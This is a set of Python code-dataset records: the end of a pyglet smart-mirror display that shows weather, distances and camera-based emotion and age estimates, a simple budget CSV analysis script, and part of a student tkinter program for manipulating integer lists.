= 'top',\n multiline = True,\n batch = batch_distances)\ntext_bicycling.font_size = 18*scale\ntext_bicycling.font_name = font_name\n\n###############################################################################\n# log en modo prod\ntexto_log = []\ntext_log = pyglet.text.HTMLLabel(\n text = '',\n x = get_coord_x(0),\n y = get_coord_y(1700),\n width = get_coord_x(540),\n anchor_x = 'left',\n anchor_y = 'top',\n multiline = True,\n batch = batch_distances)\ntext_log.font_size = 14*scale\ntext_log.font_name = font_name\nif show_logs:\n texts.append(text_log)\n\ntexto_log_ocr = ['OCR']\ntext_log_ocr = pyglet.text.HTMLLabel(\n text = '',\n x = get_coord_x(0),\n y = get_coord_y(1500),\n width = get_coord_x(540),\n anchor_x = 'left',\n anchor_y = 'top',\n multiline = True,\n batch = batch_distances)\ntext_log_ocr.font_size = 14*scale\ntext_log_ocr.font_name = font_name\nif show_logs:\n texts.append(text_log_ocr)\n\n###############################################################################\n###############################################################################\n# window 
events\n@window1.event\ndef on_close():\n imageCap.endCapture(capDevice)\n \n@window1.event\ndef on_draw():\n window1.clear()\n\n if has_people:\n if show_recomendation:\n batchTextBlock.draw()\n \n if show_qr:\n widget_qr.draw()\n batchClock.draw()\n batchWeather.draw()\n batch_distances.draw()\n emojiBatch.draw() # Dibuja todos los emojis a la vez\n \n appearance_batch.draw()\n else:\n widget.draw()\n \n if show_FPS:\n fps1.draw()\n\n@window1.event\ndef on_key_press(symbol, modifiers):\n global mirror\n global show_camera\n \n if symbol == key.C:\n show_camera = not show_camera\n if show_camera:\n cv2.namedWindow('camara', flags = cv2.WINDOW_NORMAL)\n else:\n cv2.destroyAllWindows()\n elif symbol == key.M:\n mirror = not mirror\n\n\n###############################################################################\n###############################################################################\ndef set_datetime():\n datetime = datetimeService.getDatetime()\n \n textHour.text = datetime[1]\n textHour.color = (255, 255, 255, opacity)\n textHour.font_size = 36*scale\n textHour.font_name = font_name\n \n textDate.text = datetime[2]\n textDate.color = (255, 255, 255, opacity)\n textDate.font_size = 12*scale\n textDate.font_name = font_name\n \n return\n \ndef set_weather():\n global weather_text, weather_icon, show_weather\n global _icon\n \n weather = weatherService.getPrediction(datetimeService.getDatetime()[0], not modo_prod)\n \n show_weather = not weather['error']\n if weather['error']:\n add_text_log('Weather ERROR:', weather['errorMessage'])\n else:\n weather_text = weather['temperatureText'] \n weather_icon = weather['icon']\n add_text_log('Weather:', weather_text)\n \n return\n\ndef set_text_block(texto):\n textBlock.text = texto\n textBlock.color = (255, 255, 255, opacity)\n textBlock.font_size = 24*scale\n textBlock.font_name = font_name\n \n return\n\ndef draw_text_blocks_s(dt):\n draw_text_blocks()\n \ndef draw_text_blocks():\n global show_recomendation\n \n _nombre = ' ' + nombre_ocr[0] if len(nombre_ocr[0]) > 0 else ''\n next_recomendation = recomendationService.get_next_recomendation(dev_recomendations)\n \n show_recomendation = next_recomendation[0]\n \n if next_recomendation[0]:\n add_text_log('Próxima actividad', next_recomendation[1]['actividad'])\n recomendacion = next_recomendation[1]['text'].replace('__nombre__', _nombre)\n set_text_block(recomendacion)\n else:\n set_text_block('')\n \n return\n\ndef set_text_distance(sprite, label, texto, show = True):\n op = opacity if show else 0\n \n if show:\n label.text = texto\n label.font_size = 18*scale\n label.font_name = font_name\n \n label.color = (255, 255, 255, op) \n sprite.opacity = op\n \n return\n\ndef set_text_distance_t():\n d = threading.Thread(target = set_text_distances, name = 'set_text_distances')\n d.setDaemon(True)\n d.start()\n return\n\ndef set_text_distances():\n global show_driving, show_walking, show_bicycling\n global texto_driving, texto_walking, texto_bicycling\n global show_distances\n \n distances = distanceService.get_distance(origen,destino,modo,False) \n\n for mode in distances:\n m = mode['mode']\n d = mode['data']\n show = True if d['status'] == 'OK' else False\n text = ''.join((d['distance'], '
', d['duration']))\n\n if m == 'driving':\n show_driving = show\n texto_driving = text\n elif m == 'walking':\n show_walking = show\n texto_walking = text\n elif m == 'bicycling':\n show_bicycling = show\n texto_bicycling = text\n \n # uncomment to show distances\n #show_distances = True\n \n return\n\ndef changeState(state):\n global currentEmoji\n global no_people_timestamp\n global people_timestamp\n global show_glasses, show_gender, show_age, set_kairos\n \n # record the first transition between person detected and no person\n if state == 'no_people':\n show_glasses = False\n show_gender = False\n show_age = False\n set_kairos = True\n \n if currentEmoji != resources.no_people:\n no_people_timestamp = time.time()\n else:\n if currentEmoji == resources.no_people:\n people_timestamp = time.time() \n \n if state == '' or state == 'neutro' or state == 'neutral':\n currentEmoji=resources.neutro\n elif state == 'no_people':\n currentEmoji=resources.no_people\n elif state == 'angry' or state == 'anger':\n currentEmoji=resources.angry\n elif state == 'disgust' or state == 'contempt':\n currentEmoji=resources.disgust\n elif state == 'fear':\n currentEmoji=resources.fear\n elif state == 'joy' or state == 'happiness':\n currentEmoji=resources.joy\n elif state == 'sadness':\n currentEmoji=resources.sadness\n elif state == 'surprise':\n currentEmoji=resources.surprise\n #print('change to ' + state) \n return\n\ndef get_image():\n global currentEmoji\n global set_kairos\n \n while True:\n newfile = imageCap.captureImage(capDevice,\n _mirror = mirror,\n _show_camera = show_camera,\n kairos = set_kairos)\n if '.png' in str(newfile[0]) or '.jpg' in str(newfile[0]):\n #changeState('')\n #print('capture image')\n d = threading.Thread(target = getEmociones,\n name = 'getEmociones',\n kwargs = {'filename': newfile[0]})\n d.setDaemon(True)\n d.start()\n elif 'joy' in str(newfile[0]):\n changeState('joy')\n elif 'no_people' in str(newfile[0]):\n changeState('no_people')\n elif 'neutro' in str(newfile[0]) and currentEmoji == resources.no_people:\n # switch back to neutral when a \"new\" person is found\n changeState('neutro')\n \n \"\"\"\n if '.png' in str(newfile[1]) or '.jpg' in str(newfile[1]):\n d = threading.Thread(target = get_OCR,\n name = 'get_OCR',\n kwargs = {'filename': newfile[1]})\n d.setDaemon(True)\n d.start()\n \"\"\"\n \n if '.png' in str(newfile[2]) or '.jpg' in str(newfile[2]):\n d = threading.Thread(target = get_Kairos,\n name = 'get_Kairos',\n kwargs = {'filename': newfile[2]})\n d.setDaemon(True)\n d.start()\n return\n\ndef getEmociones(filename):\n global emotion_service\n \n if 'ms' in emotion_service:\n emotion = MScognitiveService.get_emotions(filename)\n add_text_log('Emocion:', emotion[2])\n if emotion[0] != '': \n changeState(emotion[0])\n elif 'kairos' in emotion_service:\n emotions = KcognitiveService.get_emotions(filename) \n if not emotions['error']:\n emotion = KcognitiveService.get_emotion(emotions['emotions'])\n add_text_log('Emocion:', emotion[2])\n if emotion[0] != '': \n changeState(emotion[0])\n return\n\n'''\ndef getKairosData(filename):\n kairosData = KcognitiveService.get_emotions(filename)\n add_text_log('Emocion:', emotion[2])\n if emotion[0] != '': \n changeState(emotion[0])\n return\n'''\n\ndef get_OCR(filename):\n global nombre_ocr, change_ocr\n \n ocr = OCRService.get_data_ocr(filename) # status, name, company\n if ocr[0]:\n if ocr[1] in nombre_ocr:\n #match\n print('change name:', nombre_ocr[0], '>>', ocr[1])\n print(nombre_ocr)\n add_text_log_ocr('OCR MATCH:', 
ocr[1])\n nombre_ocr = [ocr[1]]\n change_ocr = True\n else:\n nombre_ocr.append(ocr[1])\n print('add ocr:', ocr[1])\n add_text_log_ocr('OCR:', ocr[1])\n \n elif nombre_ocr[0] != '':\n add_text_log_ocr('OCR:', ocr[1])\n nombre_ocr = ['']\n change_ocr = True\n return\n\ndef get_Kairos(filename):\n global show_glasses, show_gender, show_age\n global current_glasses, current_gender, current_age\n global set_kairos\n global emotion_service\n \n appearance = KcognitiveService.get_appearance(filename)\n \n set_kairos = appearance['error']\n show_glasses = not appearance['error']\n show_gender = not appearance['error']\n show_age = not appearance['error']\n \n if not appearance['error']:\n current_glasses = appearance['glasses']\n current_gender = appearance['gender']\n current_age = appearance['age_group']\n \n return\n\n###############################################################################\n###############################################################################\ndef get_image_schedule(dt):\n d = threading.Thread(target = get_image, name = 'get_image')\n d.setDaemon(True)\n d.start()\n return\n\ndef set_color():\n global opacity\n\n \"\"\"\n opacity += 30 if currentEmoji != resources.no_people else - 5\n if opacity < 0:\n opacity = 0\n elif opacity > 255:\n opacity = 255\n \"\"\"\n if opacity == 0:\n opacity = 255\n else:\n opacity = 0\n \n if show_distances:\n set_text_distance(icon_driving, text_driving, texto_driving, show_driving)\n set_text_distance(icon_walking, text_walking, texto_walking, show_walking)\n set_text_distance(icon_bicycling, text_bicycling, texto_bicycling, show_bicycling)\n \n for text in texts:\n text.color = (255, 255, 255, opacity)\n text.font_name = font_name\n \n for icon in icons:\n icon.opacity = opacity\n \n set_text_block(textBlock.text)\n \n widget.opacity = 255 - opacity\n \n #if opacity == 0 or opacity == 255:\n # pyglet.clock.unschedule(set_color)\n \n return\n\ndef set_datetime_schedule(dt): \n set_datetime()\n return\n\ndef set_weather_schedule(dt):\n d = threading.Thread(target = set_weather,\n name = 'set_weather')\n d.setDaemon(True)\n d.start()\n return\n\ndef set_text_distances_schedule(dt):\n set_text_distance_t()\n return\n\ndef add_text_log(*text):\n global texto_log\n texto_log.append(' '.join(str(t) for t in text))\n\ndef add_text_log_ocr(*text):\n global texto_log_ocr\n texto_log_ocr.append(' '.join(str(t) for t in text))\n \ndef set_text_log():\n global texto_log\n \n if len(texto_log) > 6:\n del texto_log[0]\n \n text_log.text = '
'.join(texto_log)\n text_log.color = (255, 255, 255, opacity)\n text_log.font_size = 14*scale\n text_log.font_name = font_name\n \ndef set_text_log_ocr():\n global texto_log_ocr\n \n if len(texto_log_ocr) > 6:\n del texto_log_ocr[0]\n \n text_log_ocr.text = '
'.join(texto_log_ocr)\n text_log_ocr.color = (255, 255, 255, opacity)\n text_log_ocr.font_size = 14*scale\n text_log_ocr.font_name = font_name\n\ndef update(dt):\n global currentEmoji\n global has_people\n global change_ocr\n global show_distances\n global icons, texts\n global textWeather, iconWeather, show_weather\n global no_people_timestamp\n global qr_up\n global qr_timestamp\n \n \n if has_people:\n for obj in emojis:\n obj.update(dt,currentEmoji)\n \n if show_logs:\n set_text_log()\n set_text_log_ocr()\n \n if show_distances:\n set_text_distance(icon_driving, text_driving, texto_driving, show_driving)\n set_text_distance(icon_walking, text_walking, texto_walking, show_walking)\n set_text_distance(icon_bicycling, text_bicycling, texto_bicycling, show_bicycling)\n show_distances = False\n \n if show_weather:\n if textWeather.text == '°C':\n texts.append(textWeather)\n icons.append(iconWeather)\n icons.append(widgetWeather)\n \n textWeather.text = weather_text\n textWeather.color = (255, 255, 255, opacity)\n textWeather.font_size = 24*scale\n textWeather.font_name = font_name\n \n iconWeather.image = get_weather_image()\n iconWeather.opacity = opacity\n \n widgetWeather.opacity = opacity\n \n show_weather = False\n \n if change_ocr:\n draw_text_blocks()\n change_ocr = False\n \n if show_gender:\n if 'Female' in current_gender:\n if current_glasses:\n widget_gender.image = resources.female_glasses\n else:\n widget_gender.image = resources.female\n else:\n if current_glasses:\n widget_gender.image = resources.male_glasses\n else:\n widget_gender.image = resources.male\n widget_gender.opacity = opacity\n else:\n widget_gender.image = resources.none\n widget_gender.opacity = opacity\n \n if show_age:\n if 'Child' in current_age:\n widget_age.image = resources.age_1\n elif 'Young' in current_age:\n widget_age.image = resources.age_2\n elif 'Adult' in current_age:\n widget_age.image = resources.age_3\n elif 'Senior' in current_age:\n widget_age.image = resources.age_4\n else:\n widget_age.image = resources.age_none\n widget_age.opacity = opacity\n else:\n widget_age.image = resources.none\n widget_age.opacity = opacity\n \n if emojis[0].opacity == 0:\n if has_people and abs(time.time() - no_people_timestamp) > 5:\n print('##### HIDE #####')\n \n set_color()\n #pyglet.clock.schedule_interval(set_color, 1/30.0)\n has_people = False\n else:\n no_people_timestamp = time.time()\n \n # mover QR cada 1 minuto\n if abs(time.time() - qr_timestamp) > 60:\n qr_timestamp = time.time()\n widget_qr.y += dt * (qr_velocity if qr_up else -qr_velocity)\n if widget_qr.y > qr_min_y:\n qr_up = False\n elif widget_qr.y < qr_max_y:\n qr_up = True\n \n else:\n global marca_up\n widget.y += dt * (marca_velocity if marca_up else -marca_velocity)\n if widget.y > marca_min_y:\n marca_up = False\n elif widget.y < marca_max_y:\n marca_up = True\n \n \n if not has_people and people_timestamp > 0 and abs(time.time() - people_timestamp) < 1:\n print('##### SHOW #####')\n set_color()\n #pyglet.clock.schedule_interval(set_color, 1/30.0)\n has_people = True\n draw_text_blocks()\n return\n\n\n###############################################################################\n###############################################################################\n###############################################################################\n###############################################################################\nif show_camera:\n cv2.namedWindow('camara',\n flags = cv2.WINDOW_NORMAL)\ndraw_text_blocks()\nif dev_recomendations:\n 
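set_text_log and set_text_log_ocr above cap the on-screen log at six entries by deleting index 0 on every refresh. collections.deque with maxlen gives the same bounded buffer without the manual trim; a small stand-alone sketch (plain print instead of a pyglet label):

from collections import deque

texto_log = deque(maxlen=6)  # the oldest entry falls off the front automatically

for i in range(10):
    texto_log.append('Emocion: entry %d' % i)

# only the six newest lines remain, ready to join into the label text
print('\n'.join(texto_log))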
pyglet.clock.schedule_interval(draw_text_blocks_s, 60)\nset_datetime()\npyglet.clock.schedule_interval(set_datetime_schedule, 1)\nset_weather()\npyglet.clock.schedule_interval(set_weather_schedule, 1800)\nset_text_distance_t()\npyglet.clock.schedule_interval(set_text_distances_schedule, 300)\n\npyglet.clock.schedule_interval(update, 1/60.0)\npyglet.clock.schedule_once(get_image_schedule, 0.5)\n\npyglet.app.run()\n","sub_path":"v1/Mirror.py","file_name":"Mirror.py","file_ext":"py","file_size_in_byte":29402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"616601402","text":"import os, csv\nfrom pathlib import Path\n# Assign file location with the pathlib library\ncsv_file_path = os.path.join(\"Resources\",\"budget_data.csv\")\n#Initialize variables\nmcount = 0\ntotal = 0\nreValue = 0\nDiff = 0\nDiffMax = 0\nDiffMin = 0\n#Open and read CSV file\nwith open(csv_file_path, newline='') as budget:\n csvreader = csv.reader(budget, delimiter=',')\n csv_header = next(csvreader)\n print(f'Financial Analysis'+'\\n')\n print(f'----------------------------'+'\\n')\n for i in csvreader:\n month = i[0]\n Amount = i[1]\n iAmount = int(Amount)\n Diff = iAmount - reValue\n #Placeholder to track greatest increase in profits (financial analysis)\n if DiffMax < Diff:\n DiffMax = Diff\n DiffMaxDate = month\n #Placeholder to track greatest decrease in profits (financial analysis)\n if DiffMin > Diff:\n DiffMin = Diff\n DiffMinDate = month\n PreValue = iAmount\n # Get total months (financial analysis)\n mcount = mcount + 1\n total += int(Amount)\n## Display Results ##\n#The total number of months included in the dataset\nprint(f'Total Months : {mcount}')\n#The total net amount of \"Profit/Losses\" over the entire period\nprint(f'Total: $ {total}')\n# Greatest increase in profit\nprint(f'Greatest Increase in Profits: {DiffMaxDate} : ($ {DiffMax})')\nprint(f'Greatest Decrease in Profits: {DiffMinDate} : ($ {DiffMin})')\n\n\n\n\n\n\n\n","sub_path":"PyBank/budget_data.py","file_name":"budget_data.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"319943220","text":"# Date: January 8, 2018\r\n# Author: Brandon Lo\r\n# Purpose: To perform different functions on an integer list/class\r\n# Inputs: N/A\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\n# IMPORTS\r\nimport random\r\nfrom tkinter import *\r\n\r\n# Date: January 8, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Create a class to handle and organize multiple integers\r\n# Inputs: N/A\r\n# Output: Screen / Monitor\r\n# =====\r\n# Data Elements:\r\n# Size - determines the size of the integer\r\n# intList - a list which contains multiple integers\r\n# =====\r\n# Methods:\r\n# __str__ - returns the list according to the size\r\n# initAsNum - recreates the list with a given parameter value, given the size\r\n# initAsSeq - recreates the list with the values given the size\r\n# calcTotal - returns the total value of the elements in list\r\n# calcMean - returns the average of the elements in list\r\n# findLargest - returns the largest element in list\r\n# calcFreq - returns a count of the number of elements matching a given parameter value in list\r\n# insertAt - inserts a given value into the IntGroup at a given position\r\n# removeAt - removes the element at a given parameter position in list\r\n# removeAll - removes all the elements in the list matching a 
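In the PyBank script above, each month's change is computed as iAmount - reValue, but the loop then assigns PreValue = iAmount, so reValue stays 0 and every "change" is really the raw monthly amount; the first row should also be skipped, since it has no predecessor. A corrected month-over-month delta sketch over hypothetical (month, amount) rows:

# sample rows standing in for budget_data.csv
rows = [('Jan-2010', 867884), ('Feb-2010', 984655), ('Mar-2010', 322013)]

prev = None
best_inc = (None, 0)
best_dec = (None, 0)
for month, amount in rows:
    if prev is not None:            # no delta exists for the first month
        diff = amount - prev
        if diff > best_inc[1]:
            best_inc = (month, diff)
        if diff < best_dec[1]:
            best_dec = (month, diff)
    prev = amount                   # update the comparison value every iteration

print('Greatest Increase in Profits:', best_inc)   # ('Feb-2010', 116771)
print('Greatest Decrease in Profits:', best_dec)   # ('Mar-2010', -662642)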
given parameter value\r\n# findFirst - returns the position of a given parameter value element in the list\r\n# isSorted - returns true if the list is in ascending order\r\n# merge - combines the list with another list one by one\r\n\r\nclass IntGroup():\r\n\r\n # Date: January 8, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Initialize the data elements and create an integer list\r\n # Inputs: Parameter\r\n # Output: N/A\r\n # =====================================================================\r\n def __init__(self, size = 0):\r\n if size >= 0 and size <= 20:\r\n self.size = size\r\n else:\r\n self.size = 0\r\n self.intList = []\r\n for count in range(self.size):\r\n self.intList.append(random.randint(0, self.size))\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Converts the list into a string\r\n # Inputs: Data elements\r\n # Output: Return\r\n # =====================================================================\r\n def __str__(self):\r\n return str(self.intList) + \" size: \" + str(self.size)\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Initializes the list as a number\r\n # Inputs: Data elements / Parameters\r\n # Output: Changing data elements\r\n # =====================================================================\r\n def initAsNum(self, value, size):\r\n self.intList = []\r\n if size >= 0:\r\n self.size = size\r\n for count in range(size):\r\n self.intList.append(value)\r\n else:\r\n self.size = 0\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Initializes the list as a sequence of numbers\r\n # Inputs: Data elements / Parameter\r\n # Output: Changing data elements\r\n # =====================================================================\r\n def initAsSeq(self, size):\r\n self.intList = []\r\n if size >= 0:\r\n self.size = size\r\n for count in range(1, size + 1):\r\n self.intList.append(count)\r\n else:\r\n self.size = 0\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Calculates the sum of all individual values in the list\r\n # Inputs: Data elements\r\n # Output: Return\r\n # =====================================================================\r\n def calcTotal(self):\r\n listSum = 0\r\n for num in self.intList:\r\n listSum += num\r\n return listSum\r\n\r\n # Date: January 11, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Calculates the mean of all invidual values in the list\r\n # Inputs: Data elements\r\n # Output: Return\r\n # =====================================================================\r\n def calcMean(self):\r\n size = len(self.intList)\r\n if not size == 0:\r\n listSum = float(0)\r\n for num in self.intList:\r\n listSum += num\r\n mean = listSum / size\r\n else:\r\n mean = 0\r\n return mean\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Finds the largest numebr in the integer list\r\n # Inputs: Data elements\r\n # Output: Return\r\n # =====================================================================\r\n def findLargest(self):\r\n maxInt = 0\r\n if self.size > 0:\r\n maxInt = max(self.intList)\r\n return maxInt\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Calculates the frequency of an integer in the list\r\n # Inputs: Data elements\r\n # Output: Return\r\n # =====================================================================\r\n def calcFreq(self, value):\r\n count = 0\r\n if value in self.intList:\r\n count = self.intList.count(value)\r\n return count\r\n\r\n # Date: January 9, 2018\r\n # Author: 
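calcTotal, calcMean, findLargest, and calcFreq in this class re-implement loops that Python's builtins already cover; an equivalent sketch over a plain list (not the IntGroup class itself):

int_list = [3, 1, 4, 1, 5, 9, 2, 6]

total = sum(int_list)
mean = total / len(int_list) if int_list else 0  # guard the empty case, as calcMean does
largest = max(int_list, default=0)               # default mirrors the size > 0 check
freq_of_1 = int_list.count(1)                    # count() already returns 0 for absent values

print(total, mean, largest, freq_of_1)           # 31 3.875 9 2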
Brandon Lo\r\n # Purpose: Inserts a value inside a list at a given position\r\n # Inputs: Data elements / Parameters\r\n # Output: Changing data elements\r\n # =====================================================================\r\n def insertAt(self, pos, value):\r\n if pos < 0:\r\n pos = 0\r\n elif pos >= len(self.intList):\r\n pos = len(self.intList)\r\n self.intList.insert(pos, value)\r\n self.size += 1\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Removes a value inside a list at a given position\r\n # Inputs: Data elements / Parameter\r\n # Output: Changing data elements\r\n # =====================================================================\r\n def removeAt(self, pos):\r\n if pos >= 0 and pos < len(self.intList):\r\n del self.intList[pos]\r\n self.size -= 1\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Removes all of a given value inside of the list\r\n # Inputs: Data elements / Parameter\r\n # Output: Changing data elements\r\n # =====================================================================\r\n def removeAll(self, value):\r\n while value in self.intList:\r\n self.intList.remove(value)\r\n self.size -= 1\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: To determine the first position of a given value in a list\r\n # Inputs: Data elements / Parameter\r\n # Output: Return\r\n # =====================================================================\r\n def findFirst(self, value):\r\n pos = -1\r\n if value in self.intList:\r\n pos = self.intList.index(value)\r\n return pos\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: To check if the list is sorted\r\n # Inputs: Data elements\r\n # Output: Return\r\n # =====================================================================\r\n def isSorted(self):\r\n valid = True\r\n for count in range(len(self.intList) - 1):\r\n if not self.intList[count] <= self.intList[count + 1]:\r\n valid = False\r\n return valid\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Merge two different lists to create a merged list\r\n # Inputs: Data elements / Parameter\r\n # Output: Return\r\n # =====================================================================\r\n def merge(self, secondGroup):\r\n newClass = IntGroup()\r\n newList = newClass.intList\r\n listA = self.intList[:]\r\n listB = secondGroup.intList[:]\r\n\r\n newClass.size = len(listA) + len(listB)\r\n\r\n while len(listA) > 0 and len(listB) > 0:\r\n if min(listA) <= min(listB):\r\n newList.append(min(listA))\r\n listA.remove(min(listA))\r\n else:\r\n newList.append(min(listB))\r\n listB.remove(min(listB))\r\n\r\n while len(listA) > 0:\r\n newList.append(min(listA))\r\n listA.remove(min(listA))\r\n\r\n while len(listB) > 0:\r\n newList.append(min(listB))\r\n listB.remove(min(listB))\r\n \r\n return newClass\r\n\r\n# Global variable initialization for tkinter widgets\r\nglobal group\r\ngroup = IntGroup()\r\n\r\n# Date: January 11, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Initialize the list as a sequence\r\n# Inputs: Global variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userInitSeq():\r\n if strSize.get().isdigit():\r\n group.initAsSeq(int(strSize.get()))\r\n strList.set(value = group.__str__())\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please enter a valid size.\")\r\n\r\n# Date: January 11, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Initialize the list as an integer\r\n# Inputs: Global 
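Because the merge method above extracts min() and remove()s it on every step, it sorts even unsorted groups, but at quadratic cost. When both inputs are already sorted, the classic two-pointer merge runs in linear time; a stand-alone sketch over plain lists (heapq.merge offers the same merge for sorted iterables in the standard library):

def merge_sorted(a, b):
    # walk both lists once, always taking the smaller head element
    out, i, j = [], 0, 0
    while i < len(a) and j < len(b):
        if a[i] <= b[j]:
            out.append(a[i])
            i += 1
        else:
            out.append(b[j])
            j += 1
    out.extend(a[i:])  # at most one of these tails is non-empty
    out.extend(b[j:])
    return out

print(merge_sorted([1, 3, 5], [2, 2, 6]))  # [1, 2, 2, 3, 5, 6]

For unsorted groups, sorted(listA + listB) reaches the same result more simply in O(n log n).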
variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userInitNum():\r\n if strEntryNum.get().isdigit() and strSize.get().isdigit():\r\n group.initAsNum(int(strEntryNum.get()), int(strSize.get()))\r\n strList.set(value = group.__str__())\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please enter a valid integer and size.\")\r\n\r\n# Date: January 11, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Only enables needed entry boxes when selected\r\n# Inputs: N/A\r\n# Output: Configure GUI\r\n# =====================================================================\r\n\r\ndef userClickAdd():\r\n entryVal.config(state = \"normal\")\r\n entryPos.config(state = \"normal\")\r\n\r\n# Date: January 11, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Only enables needed entry boxes when selected\r\n# Inputs: N/A\r\n# Output: Configure GUI\r\n# =====================================================================\r\n\r\ndef userClickRmv():\r\n entryVal.config(state = \"disabled\")\r\n entryPos.config(state = \"normal\")\r\n\r\n# Date: January 11, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Only enables needed entry boxes when selected\r\n# Inputs: N/A\r\n# Output: Configure GUI\r\n# =====================================================================\r\n\r\ndef userClickRmvAll():\r\n entryVal.config(state = \"normal\")\r\n entryPos.config(state = \"disabled\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Only enables needed entry boxes when selected\r\n# Inputs: N/A\r\n# Output: Configure GUI\r\n# =====================================================================\r\n\r\ndef userClickFreq():\r\n entryVal.config(state = \"normal\")\r\n entryPos.config(state = \"disabled\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Only enables needed entry boxes when selected\r\n# Inputs: N/A\r\n# Output: Configure GUI\r\n# =====================================================================\r\n\r\ndef userClickFind():\r\n entryVal.config(state = \"normal\")\r\n entryPos.config(state = \"disabled\")\r\n\r\n# Date: January 11, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Operates a function depending on the active radio button\r\n# Inputs: Global Variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userClickConfirm():\r\n if config.get() == 1:\r\n if strValue.get().isdigit() and strPosition.get().isdigit():\r\n val = int(strValue.get())\r\n pos = int(strPosition.get())\r\n group.insertAt(pos, val)\r\n strList.set(value = group.__str__())\r\n strOptionTitle.set(value = \"Added integer \" + str(val) + \" to the list at position \" + str(pos))\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please enter a valid integer value, and position.\")\r\n \r\n elif config.get() == 2:\r\n if strPosition.get().isdigit():\r\n pos = int(strPosition.get())\r\n group.removeAt(pos)\r\n strList.set(value = group.__str__())\r\n strOptionTitle.set(value = \"Removed a value from position \" + str(pos) + \" from the list.\")\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please enter a valid position.\")\r\n\r\n elif config.get() == 3:\r\n if strValue.get().isdigit():\r\n val = int(strValue.get())\r\n group.removeAll(val)\r\n strList.set(value = group.__str__())\r\n strOptionTitle.set(value = \"Removed all of integer \" + str(val) + \" from the list.\")\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please enter a valid integer value.\")\r\n\r\n elif 
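The userClickConfirm handler here selects its action with a long if/elif chain over config.get(); a dictionary of handlers keyed by the radio value is a common alternative that keeps each action self-contained (hypothetical handler names, not from this file):

def do_add():
    print('add')

def do_remove():
    print('remove')

HANDLERS = {1: do_add, 2: do_remove}  # radio value -> action

def on_confirm(value):
    handler = HANDLERS.get(value)
    if handler is None:
        print('Please choose an option first.')
    else:
        handler()

on_confirm(1)  # add
on_confirm(9)  # Please choose an option first.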
config.get() == 4:\r\n if strValue.get().isdigit():\r\n val = int(strValue.get())\r\n freq = group.calcFreq(val)\r\n strOptionTitle.set(value = \"The number \" + str(val) + \" appears \" + str(freq) + \" times in the list.\")\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please enter a valid integer value.\")\r\n\r\n elif config.get() == 5:\r\n if strValue.get().isdigit():\r\n val = int(strValue.get())\r\n pos = group.findFirst(val)\r\n if not pos < 0:\r\n strOptionTitle.set(value = \"The number \" + str(val) + \" appears at position \" + str(pos))\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please find a valid integer value found within the list.\")\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please enter a valid integer value.\")\r\n\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please choose an option first.\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Sorts the list\r\n# Inputs: Global Variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userClickSort():\r\n if not group.intList == []:\r\n group.intList.sort()\r\n strList.set(value = group.__str__())\r\n strOptionTitle.set(value = \"The list has been sorted.\")\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"There is currently no list to sort\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Checks to see if the list is sorted\r\n# Inputs: Global Variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userClickCheckSort():\r\n if not group.intList == []:\r\n sort = group.isSorted()\r\n if sort == True:\r\n strOptionTitle.set(value = \"The list is sorted.\")\r\n else:\r\n strOptionTitle.set(value = \"The list is NOT sorted.\")\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"There is currently no list to check.\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Calculates the total of all the integers in the list\r\n# Inputs: Global Variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userClickCalcTotal():\r\n if not group.intList == []:\r\n total = group.calcTotal()\r\n strOptionTitle.set(value = \"The total value of all integers in the list are \" + str(total))\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"There is currently nothing in the list...\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# 